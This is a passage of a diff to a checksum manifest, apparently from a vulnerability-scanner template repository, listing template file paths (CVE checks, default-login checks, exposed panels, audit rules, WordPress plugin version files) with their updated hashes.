 cves/2021/CVE-2021-35380.yaml:74cfad5761dfdc832494faeed7e508feddd40a00
@ -1433,6 +1435,7 @@ cves/2022/CVE-2022-0817.yaml:af4b346abca1491ac3c0c87d86ba437bc91534a7
 cves/2022/CVE-2022-0824.yaml:97957523ea40a77285894c4fc4928330c1753802
 cves/2022/CVE-2022-0826.yaml:470fd85fd447cf3262cbd21c79c496806b0ae604
 cves/2022/CVE-2022-0827.yaml:09cc67bfe68a29f310e47e74e66d0a0ae5d9fb77
+cves/2022/CVE-2022-0864.yaml:e13ef0091aae8bd6270030d86b8f7ce42675d596
 cves/2022/CVE-2022-0867.yaml:ae18c4021ea309bbb049858881b65940b80c1685
 cves/2022/CVE-2022-0870.yaml:b0a2ab0c8e5010feef74bc3dd43b871750d318c2
 cves/2022/CVE-2022-0885.yaml:6e2b985849d876512701621d39408d8ee1c9cc55
@ -1701,7 +1704,7 @@ cves/2022/CVE-2022-4306.yaml:4bd8eb03eb5f904dc05404f5ff9843d87ab17029
 cves/2022/CVE-2022-43140.yaml:024040f101bc87c342c13769a6bb3ca07adf018b
 cves/2022/CVE-2022-4320.yaml:30e43c8fd3d9932b01a129f2ce218d907750da32
 cves/2022/CVE-2022-4325.yaml:6f9c3e59265afc2558239d572163ec74b111f04d
-cves/2022/CVE-2022-43769.yaml:20581b381aaae2a31fdc7af5c58e11c3c01844cb
+cves/2022/CVE-2022-43769.yaml:b055ad57b7f1b4df4656caa06f45aaa061f93672
 cves/2022/CVE-2022-4447.yaml:0b546332f8f5eab08d4cb14ecfaa4a9ddb57518e
 cves/2022/CVE-2022-44877.yaml:e3ea224e500ef62e7e633484f967834906fd3452
 cves/2022/CVE-2022-45362.yaml:07227b3027a3c7e571edc433dcc09a6ed5376f66
@ -1743,12 +1746,13 @@ cves/2023/CVE-2023-24735.yaml:80fbbfb4248022b32c3eeb3cc37c050393a6ad69
 cves/2023/CVE-2023-24737.yaml:c08109b40c832baa1c65e07625a742f050860355
 cves/2023/CVE-2023-26255.yaml:8ffd0504336d74f129f20dc181e1b189dd64d165
 cves/2023/CVE-2023-26256.yaml:b0d15fd7d0c96cb3cfd4ac5511d21fd0ac48aa45
+cves/2023/CVE-2023-27159.yaml:25fa470e51ca120d4922337dba43b9b6af23c19e
 cves/2023/CVE-2023-27292.yaml:f8db9df5676ba287d3c647ffa2abb81c05694713
 cves/2023/CVE-2023-27587.yaml:e40934f50971f5c6da52bb3fb1c4799800472d7d
 cves/2023/CVE-2023-28343.yaml:4ea0a1456d4082924d58c830b6eec9bdd6b3dbd6
 cves/2023/CVE-2023-28432.yaml:9986e481eebf01f0bb074a579b86b466affc4663
-cves.json:bb11d37937087f38d97ed492b9b6765ff3ba6674
-cves.json-checksum.txt:3eee768be970927af1ca63cc9f9fe9691158be80
+cves.json:9f82b7d1af56734e3a98c20b74d9f3565b6b96dc
+cves.json-checksum.txt:80264d727b62f26f3a69f7d3ac2e18ea8f0d8f19
 default-logins/3com/3com-nj2000-default-login.yaml:eca8a4da5f064d711696fc159ab3a1a0beff1c0e
 default-logins/UCMDB/ucmdb-default-login.yaml:7303cc779ff9fcb8a09260ebb0270c2e7f6ed0c1
 default-logins/abb/cs141-default-login.yaml:0e909a98360e0a0a55276c76e5f00b41c41707c2
@ -1861,6 +1865,7 @@ default-logins/supermicro/supermicro-default-login.yaml:8038d68d6249b135d390f02a
 default-logins/szhe/szhe-default-login.yaml:74463ee3eb3de53110cfb39deb42d47cd5241164
 default-logins/tiny-file-manager-default-login.yaml:df004eb362af57d75dadb72b6ec55863668d9da9
 default-logins/tooljet/tooljet-default-login.yaml:4245a87ebc98af7f93c2071bf05461677e7da89a
+default-logins/trassir/trassir-default-login.yaml:e17a0976b62ea22f309f13ab947a2384e8cbe106
 default-logins/versa/versa-default-login.yaml:5c5d184775fa8241ba510d23ac23b3bcfd3c7544
 default-logins/versa/versa-flexvnf-default-login.yaml:7cb77374d6c4ed4df74d0ee288e440cb5c5457de
 default-logins/vidyo/vidyo-default-login.yaml:f813d802704fec2e7d0950bfd83685707079db53
@ -1939,6 +1944,7 @@ exposed-panels/apache/public-tomcat-manager.yaml:b92bd3535d32c56ed32929992ccd0d1
 exposed-panels/apache-jmeter-dashboard.yaml:ad606775852ffe3f4121c152a1874e1e77703b92
 exposed-panels/apiman-panel.yaml:24050453269c083075bd05c9874887facbbefd16
 exposed-panels/appsmith-web-login.yaml:686b499df925059b79ddfff8eb0a5ca50027b9b7
+exposed-panels/appwrite-panel.yaml:c93489033f4184c9ca3794d4e4e807dcbb731105
 exposed-panels/aptus-panel.yaml:9ae411a96aab6df1e8d697137e90c2d26b7953a7
 exposed-panels/aqua-enterprise-panel.yaml:3fe79e10a0ab773047f4821c2fc278c5ce61cd86
 exposed-panels/arcgis/arcgis-panel.yaml:fd1a16e2f8e50f9e6b7942c74eb4bd0cee88f160
@ -1948,6 +1954,7 @@ exposed-panels/arcgis/arcgis-tokens.yaml:e7392e84400d5a79ce8cdd0d0a8dbdc727f6376
 exposed-panels/archibus-webcentral-panel.yaml:e2f9efb527d54cf9737dbf96ed3f3cd19d8000f8
 exposed-panels/argocd-login.yaml:f730c4df19d781b09634f08feefd6ba4d14eb49a
 exposed-panels/arris-modem-detect.yaml:ad5cb1d4bd05afd0e9d6c47b32bc26e8b4d41328
+exposed-panels/aspect-control-panel.yaml:0e430bf1a6f51dcd63739f6d2cc6856fb6a00ab5
 exposed-panels/asus-router-panel.yaml:86d938184d87cf5a1aa3e8099fa0b850ae40b1ea
 exposed-panels/atlantis-detect.yaml:3213a8ec889e12b8ac74eacc36c878cb281a7489
 exposed-panels/atlassian-crowd-panel.yaml:ac1cd7c013a2ef993faf06e2a6b3adc7de6c4711
@ -2862,7 +2869,7 @@ exposures/configs/plesk-stat.yaml:0be985ddc1c0cf8dbe58276a476b095efe00946d
 exposures/configs/pre-commit-config.yaml:7558654a615f447ef3b7605b2ea587e4563a421e
 exposures/configs/procfile-config.yaml:c95cf3c918a4e00d8cebf91eb4efbb17c7c76407
 exposures/configs/proftpd-config.yaml:a399d75a9bafd7c974146d163b1ae68e474cc93c
-exposures/configs/prometheus-metrics.yaml:31597db1688e7a931eb096fc0b372797f2b6a73f
+exposures/configs/prometheus-metrics.yaml:f3d3ddc70d117fe941d2f822988f17a53d1eac18
 exposures/configs/proxy-wpad-exposure.yaml:bdd007510352481c03c8ad2194d5519fbe063626
 exposures/configs/pubspec-config.yaml:5760e0323e1ed74a1dd2c6b5fd9d0f929778f4b1
 exposures/configs/pyproject-toml.yaml:0dbcda9e9be66ddc0a48206cb1c4c8dd171319f4
@ -3143,29 +3150,29 @@ file/android/webview-addjavascript-interface.yaml:5cafbbbefd748999e7b9d31e9eed55
 file/android/webview-javascript.yaml:929f48677c680d44c643c486b775acf5e5c39388
 file/android/webview-load-url.yaml:cf892abfaa80f29a70436522f289d5eb3053980f
 file/android/webview-universal-access.yaml:96d1dc919754acd27a3f6dc55ed577e47655d611
-file/audit/cisco/configure-aaa-service.yaml:cdc9316dc2109540ad0879d5df8d2e8f8037761d
-file/audit/cisco/configure-service-timestamps-debug.yaml:010a0edc9cd2d3d8cc05e097eda29dc7d34fc1ee
-file/audit/cisco/configure-service-timestamps-logmessages.yaml:cdd1b50700bf1b18d7d0537eebeec4e2c49fc3a1
-file/audit/cisco/disable-ip-source-route.yaml:0b21ccd4061883dfa3bfcbd8499500b65e77e7b7
-file/audit/cisco/disable-pad-service.yaml:20dc2f85feb3de4784ad37d691b3c44568e5f0fa
-file/audit/cisco/enable-secret-for-password-user-and-.yaml:8a762f83c78a6f11a39d1b16db438d15c1a9e45b
-file/audit/cisco/logging-enable.yaml:445e1f6a00d86528c1e935a6360f6002ccfe836c
+file/audit/cisco/configure-aaa-service.yaml:2c2f680c4a4d44558d6d1c2ad35eb9f9213d2502
+file/audit/cisco/configure-service-timestamps-debug.yaml:7aba703293385d31bf8fe2252808ae10954993af
+file/audit/cisco/configure-service-timestamps-logmessages.yaml:262cc27d7c132890057f11ff13ec0ded6c5bbff2
+file/audit/cisco/disable-ip-source-route.yaml:1bd9d0eb702eea80d4500b3baf649679d79a4088
+file/audit/cisco/disable-pad-service.yaml:c1d011c1e10bbc3bbba49e71d1c3f38e6fd6cac2
+file/audit/cisco/enable-secret-for-password-user-and-.yaml:8a4d328bec06673eb495e3d3f913b73297e33039
+file/audit/cisco/logging-enable.yaml:22293e0120c00ea85cfed6dadaf23bb9cb772bde
 file/audit/cisco/set-and-secure-passwords.yaml:a7d954cd53d85a2f00f83b54870670fff31ff597
-file/audit/fortigate/auto-usb-install.yaml:53bab09ce952ae9806a5781ab5947833f4bb7dce
-file/audit/fortigate/heuristic-scan.yaml:eb19d931f8a86e92de4fbfdf1df5bfccab973213
-file/audit/fortigate/inactivity-timeout.yaml:674791fadb2f4d93f1af73ed871ba7070a9ae86c
-file/audit/fortigate/maintainer-account.yaml:29f3fc4f50e27cbd15ccebf71cd77f0f9086cb82
-file/audit/fortigate/password-policy.yaml:ae2f75996280398b1cf7851116d14d23bd44ca25
-file/audit/fortigate/remote-auth-timeout.yaml:ee9d0d07c786269ef84ddb9ba596578fcbdec8da
-file/audit/fortigate/scp-admin.yaml:6f34acdd21a213ab5b05a2acf5043f7d09da4ce0
-file/audit/fortigate/strong-ciphers.yaml:e772983e4f92469e234c2a91ffb1dc547f89e22b
+file/audit/fortigate/auto-usb-install.yaml:aa2bb47ad455ea4952c45618ef59a95e9cd81748
+file/audit/fortigate/heuristic-scan.yaml:d7a8b08144e1cf1c4b727f13a58fb7e3583ce512
+file/audit/fortigate/inactivity-timeout.yaml:f0ced8a24861b9f2e56548e7adae1cbb3865f32c
+file/audit/fortigate/maintainer-account.yaml:1966d965a5c5b31dcb2750b53291ef7846322dca
+file/audit/fortigate/password-policy.yaml:da2042e403ed7d94ddab985dff7263a4de277b23
+file/audit/fortigate/remote-auth-timeout.yaml:39c1813bafa483a217d1483c43f715644824db27
+file/audit/fortigate/scp-admin.yaml:88526bde924d27901dd4a1b9caf8737b1c10a46d
+file/audit/fortigate/strong-ciphers.yaml:457de07fb1ad41f0eab6c77e2952565a2297db29
 file/audit/pfsense/configure-dns-server.yaml:ad315ef5a9183d8ae18bfaaaffd7e498013c57ff
 file/audit/pfsense/configure-session-timeout.yaml:565d5194aee5da814b88a46ed22e62069661a853
 file/audit/pfsense/enable-https-protocol.yaml:fecd2ad4b606b2d94887f6cf754dd9e1301e31e7
-file/audit/pfsense/known-default-account.yaml:8d054fb009a5042ddb123e348bba9099c84d6618
+file/audit/pfsense/known-default-account.yaml:de489c19b6fc27f0d0be0ffdbdd06f758690fb0e
 file/audit/pfsense/password-protected-consolemenu.yaml:50f13f7da2c1c2ed37a84b42b16887bb978d8826
 file/audit/pfsense/set-hostname.yaml:cf6cb7d196858205bbe4a01ab3169e542c4420cf
-file/bash/bash-scanner.yaml:0554c596cfcb58910d3044b4451869068944d793
+file/bash/bash-scanner.yaml:34c81ff693760add86b161184ca4ef55535d4ba6
 file/electron/electron-version-detect.yaml:8021ce0b863fc7090d0b13a29b97bf8ef1a208b0
 file/electron/node-integration-enabled.yaml:3de6b8cc228cb5cb4d806317982aeebb49d0c4b7
 file/js/js-analyse.yaml:c2da42d2857558e8043b9d58abc062e3aeb122d6
@ -3280,19 +3287,19 @@ helpers/wordlists/wordpress-plugins.txt:916cc826b793c7afad2208b2fd46ea2cb752dec5
 helpers/wordlists/wordpress-themes.txt:3424134fa69db08604545ecf1441cf6330bf0982
 helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56
 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b
-helpers/wordpress/plugins/ad-inserter.txt:9b16a745e7361d4edace444a451bdb3e9b89056d
+helpers/wordpress/plugins/ad-inserter.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d
 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/admin-menu-editor.txt:14b46e8ec03c3008e57ed966a26b63495b68b9b7
 helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7df
-helpers/wordpress/plugins/advanced-custom-fields.txt:67f3cb9988fc4f21a782e780e51ff565a0b00582
+helpers/wordpress/plugins/advanced-custom-fields.txt:b6d5e45867209ed5ec72f9806c4ad13c5ab59bdf
 helpers/wordpress/plugins/akismet.txt:6746a82081d852d58b152584407d5b80d3ac43f3
 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:3a20090f6629e82dc86182a58926523409ffdf49
-helpers/wordpress/plugins/all-in-one-seo-pack.txt:d9902a1eb94ef3aa68394787a4c511390162b100
+helpers/wordpress/plugins/all-in-one-seo-pack.txt:caae74c29692d1f49147ef6789f6fcf2e1cbd83d
 helpers/wordpress/plugins/all-in-one-wp-migration.txt:99abf528abe6a50b536720284b0977277d673c4e
 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:1a50ead2425cd572a4f936813f2f7e9cb41e47c9
 helpers/wordpress/plugins/amp.txt:51ddbf27bf181d542a23643649c61739795a6771
-helpers/wordpress/plugins/antispam-bee.txt:0180822ba2e370cc5e6faf677e2267a49f7ca204
-helpers/wordpress/plugins/astra-sites.txt:b981b5efd3a591e7a7cda1a4740574ce3b34b19a
+helpers/wordpress/plugins/antispam-bee.txt:b91ff026739750b181b34969295fb93cf8fdc898
+helpers/wordpress/plugins/astra-sites.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b
 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711
 helpers/wordpress/plugins/autoptimize.txt:aba31d0ba474d83f50978833d17946c355cb20c4
 helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109
@ -3301,10 +3308,10 @@ helpers/wordpress/plugins/better-wp-security.txt:d97823538c9ba6289bac6fea78445ad
 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53
 helpers/wordpress/plugins/breadcrumb-navxt.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b
 helpers/wordpress/plugins/broken-link-checker.txt:f7ca6a21d278eb5ce64611aadbdb77ef1511d3dd
-helpers/wordpress/plugins/child-theme-configurator.txt:e21c87eaf180f705db4871bedae833637e72e1e4
+helpers/wordpress/plugins/child-theme-configurator.txt:8e805063c85859847271163a1c51e5865e460aea
 helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f
 helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693
-helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:0c43da0e7b24f84e7ce2298f6cf8c4c41d86a810
+helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:eb8e7756de2bfbb7ce9315c69a77420d1013f99e
 helpers/wordpress/plugins/cloudflare.txt:06a4c8fb3498a24c86d06fd73d56763fee83924e
 helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62
 helpers/wordpress/plugins/coblocks.txt:2eb538e42b910c397ab801353b059c51f265f092
@ -3333,26 +3340,26 @@ helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930c
 helpers/wordpress/plugins/easy-wp-smtp.txt:d1325bb186bd83303245e504f7c6eceae7f19e44
 helpers/wordpress/plugins/elementor.txt:d76c6741cd4fffbe969502fead7a7c2b635d109a
 helpers/wordpress/plugins/elementskit-lite.txt:e0f7c4db084212451afd4076bf9be01e0a1467da
-helpers/wordpress/plugins/enable-media-replace.txt:66eed0a7a5e1364c307f42f580a7ff24e731f1a0
+helpers/wordpress/plugins/enable-media-replace.txt:3ba1cdcd02c8fe15ffff21ff0cb646a3324830ca
 helpers/wordpress/plugins/envato-elements.txt:b685b79ec442bdfb421e197d4c4a2a78a978eec9
 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:e97f2617527884d40b1f2abadbffa7013d3e31c7
 helpers/wordpress/plugins/ewww-image-optimizer.txt:068c379ffd5ee9a5376a7aee44f0d02315091039
-helpers/wordpress/plugins/facebook-for-woocommerce.txt:23d750c90db4f1b4a546175b188d6b2f5f67526c
+helpers/wordpress/plugins/facebook-for-woocommerce.txt:1b4a405e850d7e761586173f4c8aac32ddf3d8e4
 helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/flamingo.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec
 helpers/wordpress/plugins/fluentform.txt:e881296a73d9b5b8b2320adc83e958594c7cfc29
 helpers/wordpress/plugins/font-awesome.txt:f4bf33bfd9c3793655f2a19fca0ee1ca41e62e6e
 helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb8227230edc41ff2ca6557e1
 helpers/wordpress/plugins/formidable.txt:da12d3bdce91425575a83cf92ced2c2e796b4046
-helpers/wordpress/plugins/forminator.txt:f71f720cd3f2eeaae761079ed543229ed9bd3b83
+helpers/wordpress/plugins/forminator.txt:f005898d75b9e603c42888193664960d86c97963
 helpers/wordpress/plugins/ga-google-analytics.txt:361f82e0e4329314b5ec0ac3b14d43cb15fc0c02
-helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:b693716a70cb957730292ffbb6128e90c8191886
-helpers/wordpress/plugins/google-analytics-for-wordpress.txt:5f9c6f208331601be1c9199beb28726a8da1a205
+helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:c158de3263c462a811249f4a7313c15879ba2c77
+helpers/wordpress/plugins/google-analytics-for-wordpress.txt:8adb1087654624c04e2555e315af0d6b31d2c71e
 helpers/wordpress/plugins/google-listings-and-ads.txt:cc005cc7de6351bdaa671675148c076564275a57
-helpers/wordpress/plugins/google-site-kit.txt:de4191a1f36051e78e2e6270a139ede2bcb66685
-helpers/wordpress/plugins/google-sitemap-generator.txt:c878ad0f9034b2e5c42ecc1bbafef7e617befd9b
+helpers/wordpress/plugins/google-site-kit.txt:fd9a83701b249aafb193748d6f4e6a16930e4d36
+helpers/wordpress/plugins/google-sitemap-generator.txt:422ccd75364b2eca8d9da9239cf1a72f1929c4d9
 helpers/wordpress/plugins/gtranslate.txt:2eb538e42b910c397ab801353b059c51f265f092
-helpers/wordpress/plugins/gutenberg.txt:f12d77990f6c52b756d6fd9d95a8cba6c9b18ff2
+helpers/wordpress/plugins/gutenberg.txt:79bc73d6a7c632281271baceb70e0a56a57e5e37
 helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761
 helpers/wordpress/plugins/header-footer-code-manager.txt:a9b04c078e104df6d0bcb7eef6320eee0aa3c10f
@ -3368,9 +3375,9 @@ helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfef
 helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa8604e7ecde642f7080e6
 helpers/wordpress/plugins/iwp-client.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/jetpack.txt:4fde6b87a266eece4b77ee2df16db81507c218b0
-helpers/wordpress/plugins/kadence-blocks.txt:259384e042d78de5c4a778a065bb73dad996fb07
+helpers/wordpress/plugins/kadence-blocks.txt:98f2be81dca85d834586d9f281c4849476edffb2
 helpers/wordpress/plugins/kirki.txt:3ba1cdcd02c8fe15ffff21ff0cb646a3324830ca
-helpers/wordpress/plugins/leadin.txt:3e3302cebde833e1c1a90769ec74651233db010e
+helpers/wordpress/plugins/leadin.txt:58b076bfd674fa1508b7cb0fab95ad9e608a83df
 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:8ddbd05dd8ecc26fc3ae21e51b86a28b4304a482
 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/litespeed-cache.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8
@ -3379,7 +3386,7 @@ helpers/wordpress/plugins/loginizer.txt:62c0d70e952578b13a6913ef9989b4ad0f8fa884
 helpers/wordpress/plugins/loginpress.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc
 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/mailchimp-for-wp.txt:9c14d32d2b06876029db767aad4f479a043de2d8
-helpers/wordpress/plugins/mailpoet.txt:06a4c8fb3498a24c86d06fd73d56763fee83924e
+helpers/wordpress/plugins/mailpoet.txt:291e357ce96dde2c46df4a84e44fd1d04ed7cb73
 helpers/wordpress/plugins/maintenance.txt:254b136ca21ea7ce53096fd367ddb29c22a7cce9
 helpers/wordpress/plugins/mainwp-child.txt:ab13fbe69646dec012103d7282a82e825dd50956
 helpers/wordpress/plugins/malcare-security.txt:343bbdbd51194fb727bc462f6bc4e96e31447af2
@ -3390,8 +3397,8 @@ helpers/wordpress/plugins/ml-slider.txt:96ee9b81f665f617b051c02cea0aedf30d2f6dbf
 helpers/wordpress/plugins/newsletter.txt:5e6aa1ae7e596b08e4b5370dcbc9a96c589885e1
 helpers/wordpress/plugins/nextend-facebook-connect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a
 helpers/wordpress/plugins/nextgen-gallery.txt:f004afeeb4513c0ad40862169cb66b8dd0f2b254
-helpers/wordpress/plugins/ninja-forms.txt:498618be04e947f3a82311d8ab966f519e0e7f7d
-helpers/wordpress/plugins/ocean-extra.txt:c7e3a41454e034e5ad994df8bf12b61e9fb1e1bc
+helpers/wordpress/plugins/ninja-forms.txt:e84dfc475114ecb8240d6c41e6779709c6819d43
+helpers/wordpress/plugins/ocean-extra.txt:bcfa1e591aab992fff773d6a0dc4bb58433d278a
 helpers/wordpress/plugins/official-facebook-pixel.txt:965faa18d7f005f5f4e18f490ea016d1f32a71f0
 helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8
 helpers/wordpress/plugins/optinmonster.txt:4cfe60c8b6ea716c60764f483ea6bea7609308b5
@ -3400,16 +3407,16 @@ helpers/wordpress/plugins/password-protected.txt:8e805063c85859847271163a1c51e58
 helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58
 helpers/wordpress/plugins/photo-gallery.txt:b1c247882f58e8b3b583cc369ea6c55eb3c22fed
 helpers/wordpress/plugins/php-compatibility-checker.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c
-helpers/wordpress/plugins/pixelyoursite.txt:ba4db109162f9815a249569c36ba52127de23cda
-helpers/wordpress/plugins/polylang.txt:f85383fcd7c211714084d7fca897998d7d759c5d
+helpers/wordpress/plugins/pixelyoursite.txt:ee31ee89d6600a3c4f6c98f33bf39753b8b94c15
+helpers/wordpress/plugins/polylang.txt:70b07266f33ba3fed727bda8a88e096f809934b8
 helpers/wordpress/plugins/popup-builder.txt:9d6a9d6356ced33784bbde254c46c600df05d71f
 helpers/wordpress/plugins/popup-maker.txt:c70da539b9e83a50bb70013e6a5cb6e9d4623d5c
-helpers/wordpress/plugins/post-smtp.txt:2ae3ad2f93cb6bc93d15eedb93cdf5051262687b
-helpers/wordpress/plugins/post-types-order.txt:d03f659256ae48f1c9a26c5aaec38d4360485288
+helpers/wordpress/plugins/post-smtp.txt:2fa3fb113f8058a5d74466cfa295df86c5b34d1d
+helpers/wordpress/plugins/post-types-order.txt:d77590d37919716846277a4d8ee2e51fef66a9ef
 helpers/wordpress/plugins/premium-addons-for-elementor.txt:45dfe22f5739cb0e1c23426e8c7d2032d38f836f
-helpers/wordpress/plugins/pretty-link.txt:1ee09476b338ca8261ad83be6aefa18693436588
+helpers/wordpress/plugins/pretty-link.txt:42aae5955584904bc2d13eabc3cf07107b276398
 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
-helpers/wordpress/plugins/really-simple-ssl.txt:37481ad987ac6949d28340eb658a28e09f325713
+helpers/wordpress/plugins/really-simple-ssl.txt:a3424440bed2a55822adf277f460788ed75e53f2
 helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12
 helpers/wordpress/plugins/redux-framework.txt:4cb6b226aa8498265c8ea84adcf05e5e168e17c1
 helpers/wordpress/plugins/regenerate-thumbnails.txt:d1fd48333115227b181b4b132e5511e91d95bea5
@ -3421,22 +3428,22 @@ helpers/wordpress/plugins/shortcodes-ultimate.txt:d10a0711f656bcc099ad28636b841d
 helpers/wordpress/plugins/shortpixel-image-optimiser.txt:49911098f5af8acdff20786f92ff5e717cf35906
 helpers/wordpress/plugins/simple-custom-post-order.txt:c696496c332f4053d974090a9c80d9d35ebc2ca6
 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd
-helpers/wordpress/plugins/siteguard.txt:0dc174dfc13b2c28e65ffefd75a061bb17568764
+helpers/wordpress/plugins/siteguard.txt:b26853e0fc7b2e0fccdc39c5fe508249d0d5d410
 helpers/wordpress/plugins/siteorigin-panels.txt:635d1587c7cea3cd8f9e6a267d683d493b1f5be1
 helpers/wordpress/plugins/smart-slider-3.txt:582cdd5f25e446adf12a22541d8760ef014c9007
-helpers/wordpress/plugins/so-widgets-bundle.txt:f9093f570495ae0d03e8bc941c7108b6733ef359
+helpers/wordpress/plugins/so-widgets-bundle.txt:2ce938646563b90318d5c6246262d4c6a55518c1
 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53
-helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:0b4c30d330aeb6f14de9357ab211cbc94cb053df
-helpers/wordpress/plugins/sucuri-scanner.txt:162c48eddc15d70caf97338f121b82a6ae45d0c1
+helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:e195b9566e399f3d2ff277cc9fb271d0dd1a9e93
+helpers/wordpress/plugins/sucuri-scanner.txt:223960ccc78aab169c55e54fb7d9ed6bf1fd29d9
 helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172
 helpers/wordpress/plugins/table-of-contents-plus.txt:40bf252ebc68d2921a7e909064c29fd95a1820fb
-helpers/wordpress/plugins/tablepress.txt:31f566259c1a3f810256e3679e10faa457bb4a0b
+helpers/wordpress/plugins/tablepress.txt:d24fa45ca77f079cc359c97272276969e6aead2c
 helpers/wordpress/plugins/taxonomy-terms-order.txt:b26853e0fc7b2e0fccdc39c5fe508249d0d5d410
-helpers/wordpress/plugins/the-events-calendar.txt:57fe5fcfa732b5044c7fd98f5d7ff330eacb907c
+helpers/wordpress/plugins/the-events-calendar.txt:47d13aa1cdb30cf165008fc9d16afff2301df3b2
 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/tinymce-advanced.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf
 helpers/wordpress/plugins/translatepress-multilingual.txt:317ed41a757a4ad0ce808afd99dbc4ec974d9991
-helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:51ddbf27bf181d542a23643649c61739795a6771
+helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:cc005cc7de6351bdaa671675148c076564275a57
 helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f
 helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d
 helpers/wordpress/plugins/updraftplus.txt:f005898d75b9e603c42888193664960d86c97963
@ -3451,18 +3458,18 @@ helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:7c8e569c1f9c5ae2b779
 helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d176141136f1fe969aeca56eb98e3734f24199ae
 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3
-helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b
+helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:8470da5c818e6dc68d623fea21c1b507e075b906
 helpers/wordpress/plugins/woocommerce-payments.txt:e97f2617527884d40b1f2abadbffa7013d3e31c7
 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae
-helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:2760f23f36812b1f488df2ca1b312429d68b0f8e
+helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:4464e9f2e5e0cf52e9c26d3864e71249d73ea33a
 helpers/wordpress/plugins/woocommerce-services.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb
-helpers/wordpress/plugins/woocommerce.txt:17d26c7ad4b1baa3e1976533f499eef793ef5338
+helpers/wordpress/plugins/woocommerce.txt:7035802a8f118b141c54f97b9e8bf36b7d7f53a2
 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da
 helpers/wordpress/plugins/wordfence.txt:14665694dff2d37ef9323cf70015fe0466bea9b2
 helpers/wordpress/plugins/wordpress-importer.txt:48026248575be074288e0b8334c8383a52f12906
-helpers/wordpress/plugins/wordpress-seo.txt:9f1c5ffd9e51da7ae2f58b43c818504dfc7fbd36
